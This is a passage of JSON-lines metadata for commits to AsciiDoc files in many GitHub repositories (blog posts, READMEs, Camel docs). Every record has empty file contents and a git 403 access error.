zregvart\/camel,sverkera\/camel,apache\/camel,adessaigne\/camel,DariusX\/camel,dmvolod\/camel,pmoerenhout\/camel,nicolaferraro\/camel,snurmine\/camel,nicolaferraro\/camel,alvinkwekel\/camel,snurmine\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,jamesnetherton\/camel,apache\/camel,punkhorn\/camel-upstream,tadayosi\/camel,adessaigne\/camel,davidkarlsen\/camel,jonmcewen\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,zregvart\/camel,apache\/camel,kevinearls\/camel,jamesnetherton\/camel,anoordover\/camel,christophd\/camel,kevinearls\/camel,pax95\/camel,adessaigne\/camel,objectiser\/camel,gautric\/camel,curso007\/camel,dmvolod\/camel,gautric\/camel,mcollovati\/camel,davidkarlsen\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tdiesler\/camel,christophd\/camel,tdiesler\/camel,onders86\/camel,punkhorn\/camel-upstream,curso007\/camel,nikhilvibhav\/camel,mcollovati\/camel,akhettar\/camel,sverkera\/camel,kevinearls\/camel,ullgren\/camel,dmvolod\/camel,gautric\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,jonmcewen\/camel,nicolaferraro\/camel,objectiser\/camel,Fabryprog\/camel,onders86\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,kevinearls\/camel,zregvart\/camel,dmvolod\/camel,tadayosi\/camel,kevinearls\/camel,curso007\/camel,ullgren\/camel,adessaigne\/camel,pax95\/camel,curso007\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,Fabryprog\/camel,akhettar\/camel,CodeSmell\/camel,anoordover\/camel,gnodet\/camel,mcollovati\/camel,tadayosi\/camel,anoordover\/camel,cunningt\/camel,adessaigne\/camel,snurmine\/camel,cunningt\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeProperty-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeProperty-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c45b7bb7fe97aa21371c761d828ab833fa9a7e8","subject":"Update 2015-06-10-Wednesday.adoc","message":"Update 2015-06-10-Wednesday.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-10-Wednesday.adoc","new_file":"_posts\/2015-06-10-Wednesday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871a6fb2af12238d26985544daf539ac1f406610","subject":"Update 2079-07-15-Test-Post.adoc","message":"Update 2079-07-15-Test-Post.adoc","repos":"TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting,TunnyTraffic\/gh-hosting","old_file":"_posts\/2079-07-15-Test-Post.adoc","new_file":"_posts\/2079-07-15-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TunnyTraffic\/gh-hosting.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdbfab0eb7adfa96d07ead766ad3ef3a0b515a1d","subject":"y2b create post Is This The Toothbrush Of The Future?","message":"y2b create post Is This The Toothbrush Of The Future?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-28-Is-This-The-Toothbrush-Of-The-Future.adoc","new_file":"_posts\/2016-11-28-Is-This-The-Toothbrush-Of-The-Future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2c03b7dca1e506085941e7fb73a09fedd2162f","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdf44dfdad4e200d1ae78d3c671ceac51b4b203d","subject":"y2b create post Galaxy S4 Giveaway Update - CLICK HERE!","message":"y2b create post Galaxy S4 Giveaway Update - CLICK HERE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-10-Galaxy-S4-Giveaway-Update--CLICK-HERE.adoc","new_file":"_posts\/2013-05-10-Galaxy-S4-Giveaway-Update--CLICK-HERE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"617b94769a546f3c1e2ea83a7799b126b13caf8b","subject":"Update 2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","message":"Update 2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","new_file":"_posts\/2017-04-13-reset-git-fork-when-commits-ahead-of-upstream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabbff4656f69ad18bb70fa949373b5d6fd9c97f","subject":"Fixing pom.xml path for maven sample","message":"Fixing pom.xml path for maven sample\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d20395362ae4b97568b688d609673866ff9e70eb","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e70ebadf380b5af9da88ac2693dd2a725d37819c","subject":"Update 2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","message":"Update 2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","new_file":"_posts\/2018-01-30-Gen-Y-The-Paradox-Of-Abundance-And-Why-We-Should-Read-More-History.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"377012cb9f21b3fffb5f32d4853c3ba51da69431","subject":"New readme to explain the examples directory.","message":"New readme to explain the examples directory.\n","repos":"hypatia-software-org\/hypatia-engine,brechin\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"examples\/readme.adoc","new_file":"examples\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e4cef5a3c0ffeb2980d5e81917c9e552c1b8f3","subject":"adds ReadMe File","message":"adds ReadMe File\n\npart of #7\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"mongodb-redis-integration\/ReadMe.adoc","new_file":"mongodb-redis-integration\/ReadMe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23b3e46cab95e92cb50ba792f4b47dc2ca54fb8f","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69b248687ad12ab25edbf502dcb007ce4180a144","subject":"Renamed document.","message":"Renamed document.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/build_sources_netbeans_svn.adoc","new_file":"src\/docs\/asciidoc\/jme3\/build_sources_netbeans_svn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"3458d81ffdd12615106cfc503ce95c1490c31393","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"940c6c1524357e96971fbe2bd835b310a2eafc9d","subject":"y2b create post Can Your Pen Do This?","message":"y2b create post Can Your Pen Do This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-15-Can-Your-Pen-Do-This.adoc","new_file":"_posts\/2017-01-15-Can-Your-Pen-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec3eb18a8bd72311ead1868b6b52fcc6c586515","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dac9d6116f681978cf372e4dea1ea548ba62c82d","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a0a22fdd2d6c7d90688c5d11a7d872a609334fb","subject":"added license file","message":"added license file\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"912e55f6c40d58fcd0c96503dabca1ce7724111c","subject":"add haskell file","message":"add haskell file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Haskell.adoc","new_file":"Haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"d373fc62ce66c69d108f28c7d5132f95b6e51391","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b6cfb7bb153b19d9f54722c1a3d094d88c89316","subject":"Update 2015-07-21-Entity-Framework-some-lessons-learned.adoc","message":"Update 2015-07-21-Entity-Framework-some-lessons-learned.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-21-Entity-Framework-some-lessons-learned.adoc","new_file":"_posts\/2015-07-21-Entity-Framework-some-lessons-learned.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"288da263c11c167b18186701fda9379996fda8f3","subject":"Added empty summary file to try to force Gitbook to load project","message":"Added empty summary file to try to force Gitbook to load project\n","repos":"DBCG\/Dataphor,DBCG\/Dataphor,DBCG\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,DBCG\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,DBCG\/Dataphor,DBCG\/Dataphor","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/n8allan\/Dataphor.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6440f9035fcbf4a1e8cd9b0216e6447bf30a22c7","subject":"Update 2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","message":"Update 2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","new_file":"_posts\/2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77457d18c1cad22138289d658d733ce7b9c05db6","subject":"Coffee","message":"Coffee\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42d90810958d05335dad0ebbf6adca1d79321dba","subject":"Update 2015-08-16-Test-Post-Title.adoc","message":"Update 2015-08-16-Test-Post-Title.adoc","repos":"abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io","old_file":"_posts\/2015-08-16-Test-Post-Title.adoc","new_file":"_posts\/2015-08-16-Test-Post-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abhayghatpande\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1911d1d261164b0c8ad83423928a2e8967c1c07e","subject":"Update 2019-12-19-blog-poem-draft.adoc","message":"Update 2019-12-19-blog-poem-draft.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-19-blog-poem-draft.adoc","new_file":"_posts\/2019-12-19-blog-poem-draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acc4199cee1f03b3e5782d45c16b5bf13147dab","subject":"Create readme.asciidoc","message":"Create readme.asciidoc\n\nFile for Spanish Translation","repos":"ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials","old_file":"workshops\/minecraft\/es\/readme.asciidoc","new_file":"workshops\/minecraft\/es\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ooms\/materials.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"54795b152bf331b2f3ee0f14e08bcbe58327a5be","subject":"init(REPO): setup repository for BPMN model","message":"init(REPO): setup repository for BPMN model\n","repos":"langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform","old_file":"model-api\/bpmn-model\/README.asciidoc","new_file":"model-api\/bpmn-model\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/langfr\/camunda-bpm-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6774839291bd819075f62d305b371e430e1f78d","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"364a2d59cf9b4152c8928b5f13e39f7fc223ae4a","subject":"Update 2015-09-26-OS-review.adoc","message":"Update 2015-09-26-OS-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-OS-review.adoc","new_file":"_posts\/2015-09-26-OS-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f77fd7be5a438f90df0c88e1df6d65152540f868","subject":"Update 2015-10-21-Bienvenue.adoc","message":"Update 2015-10-21-Bienvenue.adoc","repos":"itsmyr4bbit\/blog,itsmyr4bbit\/blog,itsmyr4bbit\/blog","old_file":"_posts\/2015-10-21-Bienvenue.adoc","new_file":"_posts\/2015-10-21-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsmyr4bbit\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48a68e59452c3168b5ffacf8717c486c3ee88a5","subject":"Update 2017-02-05-Testing-1.adoc","message":"Update 2017-02-05-Testing-1.adoc","repos":"lichengzhu\/blog,lichengzhu\/blog,lichengzhu\/blog,lichengzhu\/blog","old_file":"_posts\/2017-02-05-Testing-1.adoc","new_file":"_posts\/2017-02-05-Testing-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lichengzhu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df855202d7d91464fac991f6df7ce0d049ec405","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d5821c1ada8b7c260d6312abfc1710786ee6ab7","subject":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","message":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","repos":"zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io","old_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zubrx\/zubrx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06f5ff482aa2a5bf04b82637d511d26390af1412","subject":"y2b create post RC Airsoft Battle Tank Unboxing!","message":"y2b create post RC Airsoft Battle Tank Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-02-RC-Airsoft-Battle-Tank-Unboxing.adoc","new_file":"_posts\/2011-12-02-RC-Airsoft-Battle-Tank-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b82f44a5638f71b6559687e658caedbabbe0e88b","subject":"Update 2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","message":"Update 2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","new_file":"_posts\/2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241d419b243979c6f3707dd507c30752dd3baad0","subject":"Update 2010-06-09-js-Chessboard-02-est-disponible.adoc","message":"Update 2010-06-09-js-Chessboard-02-est-disponible.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-06-09-js-Chessboard-02-est-disponible.adoc","new_file":"_posts\/2010-06-09-js-Chessboard-02-est-disponible.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6f421a87b173638445944f6a9d2d714485d1937","subject":"Update 2016-12-04-Get-Paid-for-Every-Contribution.adoc","message":"Update 2016-12-04-Get-Paid-for-Every-Contribution.adoc","repos":"tedbergeron\/Transition,tedbergeron\/Transition,tedbergeron\/Transition","old_file":"_posts\/2016-12-04-Get-Paid-for-Every-Contribution.adoc","new_file":"_posts\/2016-12-04-Get-Paid-for-Every-Contribution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/Transition.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa0587426f83edfd9b1441b2f4984a16fc1219d7","subject":"Adds docs","message":"Adds docs\n","repos":"cazacugmihai\/codebrag,softwaremill\/codebrag,cazacugmihai\/codebrag,softwaremill\/codebrag,cazacugmihai\/codebrag,cazacugmihai\/codebrag,cazacugmihai\/codebrag,softwaremill\/codebrag,softwaremill\/codebrag","old_file":"WEBHOOKS.adoc","new_file":"WEBHOOKS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cazacugmihai\/codebrag.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"718629fcf77bd945f5106c1c6365f4cf323c7081","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed55cb9759576aefefdccf9bb8e9efbc01ea6d5e","subject":"add optional step for more actuator endpoints","message":"add optional step for more actuator endpoints\n","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works","old_file":"actuator.adoc","new_file":"actuator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The 